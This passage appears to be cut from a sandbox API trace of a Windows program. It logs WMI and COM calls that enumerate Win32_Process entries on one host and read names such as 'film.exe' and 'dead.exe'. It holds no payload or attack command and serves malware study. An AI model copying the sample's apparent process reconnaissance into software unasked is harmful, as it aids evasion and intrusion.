ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.795] WbemDefPath:IUnknown:AddRef (This=0x5e8ac10) returned 0x3 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cef8) returned 0x0 [0224.795] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cef8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.795] WbemDefPath:IUnknown:Release (This=0x5e8cef8) returned 0x3 [0224.795] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.796] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.796] WbemDefPath:IUnknown:Release (This=0x5e8ac10) returned 0x2 [0224.796] WbemDefPath:IUnknown:Release (This=0x5e8ac10) returned 0x1 [0224.796] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.796] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ac10, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8ac10) returned 0x0 [0224.796] WbemDefPath:IUnknown:AddRef (This=0x5e8ac10) returned 0x3 [0224.796] WbemDefPath:IUnknown:Release (This=0x5e8ac10) returned 0x2 [0224.796] WbemDefPath:IWbemPath:SetText (This=0x5e8ac10, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2480\"") returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.796] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.796] IWbemClassObject:Get (in: This=0x742d68, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e9984*=0, plFlavor=0x26e9988*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="film.exe", varVal2=0x0), pType=0x26e9984*=8, plFlavor=0x26e9988*=0) returned 0x0 [0224.797] SysStringByteLen (bstr="film.exe") returned 0x10 [0224.797] SysStringByteLen (bstr="film.exe") returned 0x10 [0224.797] IWbemClassObject:Get (in: This=0x742d68, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e9984*=8, plFlavor=0x26e9988*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="film.exe", varVal2=0x0), pType=0x26e9984*=8, plFlavor=0x26e9988*=0) returned 0x0 [0224.797] SysStringByteLen (bstr="film.exe") returned 0x10 [0224.797] SysStringByteLen (bstr="film.exe") returned 0x10 [0224.797] CoTaskMemAlloc (cb=0x4) returned 0x5e8cf28 [0224.797] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cf28, puReturned=0x26dde18 | out: apObjects=0x5e8cf28*=0x742f00, puReturned=0x26dde18*=0x1) returned 0x0 [0224.870] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742f00) returned 0x0 [0224.870] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.870] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.871] IUnknown:AddRef (This=0x742f00) returned 0x3 [0224.871] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.871] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.871] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742f04) returned 0x0 [0224.871] IMarshal:GetUnmarshalClass (in: This=0x742f04, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.871] IUnknown:Release (This=0x742f04) returned 0x3 [0224.871] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.871] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.871] IUnknown:QueryInterface (in: This=0x742f00, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.871] IUnknown:Release (This=0x742f00) returned 0x2 [0224.871] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.871] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.871] IUnknown:QueryInterface (in: This=0x742f00, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742f00) returned 0x0 [0224.871] IUnknown:AddRef (This=0x742f00) returned 0x4 [0224.871] IUnknown:Release (This=0x742f00) returned 0x3 [0224.871] IUnknown:Release (This=0x742f00) returned 0x2 [0224.871] CoTaskMemFree (pv=0x5e8cf28) [0224.871] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.871] IUnknown:AddRef (This=0x742f00) returned 0x3 [0224.871] IWbemClassObject:Get (in: This=0x742f00, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.872] IWbemClassObject:Get (in: This=0x742f00, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2948\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.872] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2948\"") returned 0x66 [0224.872] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2948\"") returned 0x66 [0224.872] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.872] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.872] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.872] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.873] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cf28) returned 0x0 [0224.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cf28, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.873] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cf28, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8acf0) returned 0x0 [0224.873] WbemDefPath:IUnknown:Release (This=0x5e8cf28) returned 0x0 [0224.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8acf0) returned 0x0 [0224.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.874] WbemDefPath:IUnknown:AddRef (This=0x5e8acf0) returned 0x3 [0224.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cf38) returned 0x0 [0224.874] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cf38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.874] WbemDefPath:IUnknown:Release (This=0x5e8cf38) returned 0x3 [0224.874] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.874] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.874] WbemDefPath:IUnknown:Release (This=0x5e8acf0) returned 0x2 [0224.874] WbemDefPath:IUnknown:Release (This=0x5e8acf0) returned 0x1 [0224.874] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.874] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8acf0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8acf0) returned 0x0 [0224.874] WbemDefPath:IUnknown:AddRef (This=0x5e8acf0) returned 0x3 [0224.874] WbemDefPath:IUnknown:Release (This=0x5e8acf0) returned 0x2 [0224.874] WbemDefPath:IWbemPath:SetText (This=0x5e8acf0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2948\"") returned 0x0 [0224.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.874] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.875] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.875] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.875] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.875] IWbemClassObject:Get (in: This=0x742f00, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ea1e8*=0, plFlavor=0x26ea1ec*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dead.exe", varVal2=0x0), pType=0x26ea1e8*=8, plFlavor=0x26ea1ec*=0) returned 0x0 [0224.875] SysStringByteLen (bstr="dead.exe") returned 0x10 [0224.875] SysStringByteLen (bstr="dead.exe") returned 0x10 [0224.875] IWbemClassObject:Get (in: This=0x742f00, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ea1e8*=8, plFlavor=0x26ea1ec*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dead.exe", varVal2=0x0), pType=0x26ea1e8*=8, plFlavor=0x26ea1ec*=0) returned 0x0 [0224.875] SysStringByteLen (bstr="dead.exe") returned 0x10 [0224.875] SysStringByteLen (bstr="dead.exe") returned 0x10 [0224.875] CoTaskMemAlloc (cb=0x4) returned 0x5e8cf68 [0224.875] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cf68, puReturned=0x26dde18 | out: apObjects=0x5e8cf68*=0x743098, puReturned=0x26dde18*=0x1) returned 0x0 [0224.876] IUnknown:QueryInterface (in: This=0x743098, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743098) returned 0x0 [0224.876] IUnknown:QueryInterface (in: This=0x743098, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.876] IUnknown:QueryInterface (in: This=0x743098, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.876] IUnknown:AddRef (This=0x743098) returned 0x3 [0224.876] IUnknown:QueryInterface (in: This=0x743098, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.877] IUnknown:QueryInterface (in: This=0x743098, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.877] IUnknown:QueryInterface (in: This=0x743098, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x74309c) returned 0x0 [0224.877] IMarshal:GetUnmarshalClass (in: This=0x74309c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.877] IUnknown:Release (This=0x74309c) returned 0x3 [0224.877] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.877] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.877] IUnknown:QueryInterface (in: This=0x743098, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.877] IUnknown:Release (This=0x743098) returned 0x2 [0224.877] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.877] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.877] IUnknown:QueryInterface (in: This=0x743098, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743098) returned 0x0 [0224.877] IUnknown:AddRef (This=0x743098) returned 0x4 [0224.877] IUnknown:Release (This=0x743098) returned 0x3 [0224.877] IUnknown:Release (This=0x743098) returned 0x2 [0224.877] CoTaskMemFree (pv=0x5e8cf68) [0224.878] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.878] IUnknown:AddRef (This=0x743098) returned 0x3 [0224.878] IWbemClassObject:Get (in: This=0x743098, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.878] IWbemClassObject:Get (in: This=0x743098, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2956\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.878] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2956\"") returned 0x66 [0224.878] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2956\"") returned 0x66 [0224.878] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.878] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.878] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.878] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.879] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cf68) returned 0x0 [0224.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cf68, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 